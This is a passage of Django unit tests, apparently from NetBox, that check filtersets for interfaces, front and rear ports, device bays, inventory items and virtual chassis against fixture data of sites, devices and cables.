                      rf_channel_frequency=5160, rf_channel_width=20),
        )
Interface.objects.bulk_create(interfaces)
# Cables
Cable(termination_a=interfaces[0], termination_b=interfaces[3]).save()
Cable(termination_a=interfaces[1], termination_b=interfaces[4]).save()
        # Interfaces 3 and 6 (and the wireless interfaces 7 and 8) are left uncabled
def test_name(self):
params = {'name': ['Interface 1', 'Interface 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_enabled(self):
params = {'enabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'enabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mtu(self):
params = {'mtu': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mgmt_only(self):
params = {'mgmt_only': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'mgmt_only': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_mode(self):
params = {'mode': InterfaceModeChoices.MODE_ACCESS}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
# Create child interfaces
parent_interface = Interface.objects.first()
child_interfaces = (
Interface(device=parent_interface.device, name='Child 1', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
Interface(device=parent_interface.device, name='Child 2', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
Interface(device=parent_interface.device, name='Child 3', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
)
Interface.objects.bulk_create(child_interfaces)
params = {'parent_id': [parent_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_bridge(self):
# Create bridged interfaces
bridge_interface = Interface.objects.first()
bridged_interfaces = (
Interface(device=bridge_interface.device, name='Bridged 1', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=bridge_interface.device, name='Bridged 2', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=bridge_interface.device, name='Bridged 3', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(bridged_interfaces)
params = {'bridge_id': [bridge_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_lag(self):
# Create LAG members
device = Device.objects.first()
lag_interface = Interface(device=device, name='LAG', type=InterfaceTypeChoices.TYPE_LAG)
lag_interface.save()
lag_members = (
Interface(device=device, name='Member 1', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=device, name='Member 2', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=device, name='Member 3', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(lag_members)
params = {'lag_id': [lag_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_virtual_chassis_id(self):
params = {'virtual_chassis_id': [VirtualChassis.objects.first().pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_kind(self):
params = {'kind': 'physical'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'kind': 'virtual'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 0)
def test_mac_address(self):
params = {'mac_address': ['00-00-00-00-00-01', '00-00-00-00-00-02']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [InterfaceTypeChoices.TYPE_1GE_FIXED, InterfaceTypeChoices.TYPE_1GE_GBIC]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_role(self):
params = {'rf_role': [WirelessRoleChoices.ROLE_AP, WirelessRoleChoices.ROLE_STATION]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel(self):
params = {'rf_channel': [WirelessChannelChoices.CHANNEL_24G_1, WirelessChannelChoices.CHANNEL_5G_32]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel_frequency(self):
params = {'rf_channel_frequency': [2412, 5160]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel_width(self):
params = {'rf_channel_width': [22, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tx_power(self):
params = {'tx_power': [40]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
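# FrontPort filtering: port attributes, topology, and cable state.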
class FrontPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = FrontPort.objects.all()
filterset = FrontPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[2], name='Rear Port 3', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 4', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 5', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 6', type=PortTypeChoices.TYPE_8P8C, positions=6),
)
RearPort.objects.bulk_create(rear_ports)
        front_ports = (
            FrontPort(device=devices[0], name='Front Port 1', label='A', type=PortTypeChoices.TYPE_8P8C,
                      color=ColorChoices.COLOR_RED, rear_port=rear_ports[0], rear_port_position=1, description='First'),
            FrontPort(device=devices[1], name='Front Port 2', label='B', type=PortTypeChoices.TYPE_110_PUNCH,
                      color=ColorChoices.COLOR_GREEN, rear_port=rear_ports[1], rear_port_position=2, description='Second'),
            FrontPort(device=devices[2], name='Front Port 3', label='C', type=PortTypeChoices.TYPE_BNC,
                      color=ColorChoices.COLOR_BLUE, rear_port=rear_ports[2], rear_port_position=3, description='Third'),
            FrontPort(device=devices[3], name='Front Port 4', label='D', type=PortTypeChoices.TYPE_FC,
                      rear_port=rear_ports[3], rear_port_position=1),
            FrontPort(device=devices[3], name='Front Port 5', label='E', type=PortTypeChoices.TYPE_FC,
                      rear_port=rear_ports[4], rear_port_position=1),
            FrontPort(device=devices[3], name='Front Port 6', label='F', type=PortTypeChoices.TYPE_FC,
                      rear_port=rear_ports[5], rear_port_position=1),
        )
FrontPort.objects.bulk_create(front_ports)
# Cables
Cable(termination_a=front_ports[0], termination_b=front_ports[3]).save()
Cable(termination_a=front_ports[1], termination_b=front_ports[4]).save()
        # Front Ports 3 and 6 are not connected
def test_name(self):
params = {'name': ['Front Port 1', 'Front Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RearPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RearPort.objects.all()
filterset = RearPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', label='A', type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED, positions=1, description='First'),
RearPort(device=devices[1], name='Rear Port 2', label='B', type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN, positions=2, description='Second'),
RearPort(device=devices[2], name='Rear Port 3', label='C', type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE, positions=3, description='Third'),
RearPort(device=devices[3], name='Rear Port 4', label='D', type=PortTypeChoices.TYPE_FC, positions=4),
RearPort(device=devices[3], name='Rear Port 5', label='E', type=PortTypeChoices.TYPE_FC, positions=5),
RearPort(device=devices[3], name='Rear Port 6', label='F', type=PortTypeChoices.TYPE_FC, positions=6),
)
RearPort.objects.bulk_create(rear_ports)
# Cables
Cable(termination_a=rear_ports[0], termination_b=rear_ports[3]).save()
Cable(termination_a=rear_ports[1], termination_b=rear_ports[4]).save()
        # Rear Ports 3 and 6 are not connected
def test_name(self):
params = {'name': ['Rear Port 1', 'Rear Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_positions(self):
params = {'positions': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceBayTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceBay.objects.all()
filterset = DeviceBayFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
)
Device.objects.bulk_create(devices)
device_bays = (
DeviceBay(device=devices[0], name='Device Bay 1', label='A', description='First'),
DeviceBay(device=devices[1], name='Device Bay 2', label='B', description='Second'),
DeviceBay(device=devices[2], name='Device Bay 3', label='C', description='Third'),
)
DeviceBay.objects.bulk_create(device_bays)
def test_name(self):
params = {'name': ['Device Bay 1', 'Device Bay 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class InventoryItemTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = InventoryItem.objects.all()
filterset = InventoryItemFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_type = DeviceType.objects.create(manufacturer=manufacturers[0], model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
)
Device.objects.bulk_create(devices)
inventory_items = (
InventoryItem(device=devices[0], manufacturer=manufacturers[0], name='Inventory Item 1', label='A', part_id='1001', serial='ABC', asset_tag='1001', discovered=True, description='First'),
InventoryItem(device=devices[1], manufacturer=manufacturers[1], name='Inventory Item 2', label='B', part_id='1002', serial='DEF', asset_tag='1002', discovered=True, description='Second'),
InventoryItem(device=devices[2], manufacturer=manufacturers[2], name='Inventory Item 3', label='C', part_id='1003', serial='GHI', asset_tag='1003', discovered=False, description='Third'),
)
for i in inventory_items:
i.save()
child_inventory_items = (
InventoryItem(device=devices[0], name='Inventory Item 1A', parent=inventory_items[0]),
InventoryItem(device=devices[1], name='Inventory Item 2A', parent=inventory_items[1]),
InventoryItem(device=devices[2], name='Inventory Item 3A', parent=inventory_items[2]),
)
for i in child_inventory_items:
i.save()
def test_name(self):
params = {'name': ['Inventory Item 1', 'Inventory Item 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_part_id(self):
params = {'part_id': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_discovered(self):
# TODO: Fix boolean value
params = {'discovered': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'discovered': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_parent_id(self):
parent_items = InventoryItem.objects.filter(parent__isnull=True)[:2]
params = {'parent_id': [parent_items[0].pk, parent_items[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': 'ABC'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'serial': 'abc'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class VirtualChassisTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = VirtualChassis.objects.all()
filterset = VirtualChassisFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], vc_position=1),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[0], vc_position=2),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[1], vc_position=1),
Device(name='Device 4', device_type=device_type, device_role=device_role, site=sites[1], vc_position=2),
Device(name='Device 5', device_type=device_type, device_role=device_role, site=sites[2], vc_position=1),
Device(name='Device 6', device_type=device_type, device_role=device_role, site=sites[2], vc_position=2),
)
Device.objects.bulk_create(devices)
virtual_chassis = (
VirtualChassis(name='VC 1', master=devices[0], domain='Domain 1'),
VirtualChassis(name='VC 2', master=devices[2], domain='Domain 2'),
VirtualChassis(name='VC 3', master=devices[4], domain='Domain 3'),
)
VirtualChassis.objects.bulk_create(virtual_chassis)
Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis[0])
Device.objects.filter(pk=devices[3].pk).update(virtual_chassis=virtual_chassis[1])
Device.objects.filter(pk=devices[5].pk).update(virtual_chassis=virtual_chassis[2])
def test_domain(self):
params = {'domain': ['Domain 1', 'Domain 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_master(self):
masters = Device.objects.all()
params = {'master_id': [masters[0].pk, masters[2].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'master': [masters[0].name, masters[2].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_name(self):
params = {'name': ['VC 1', 'VC 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
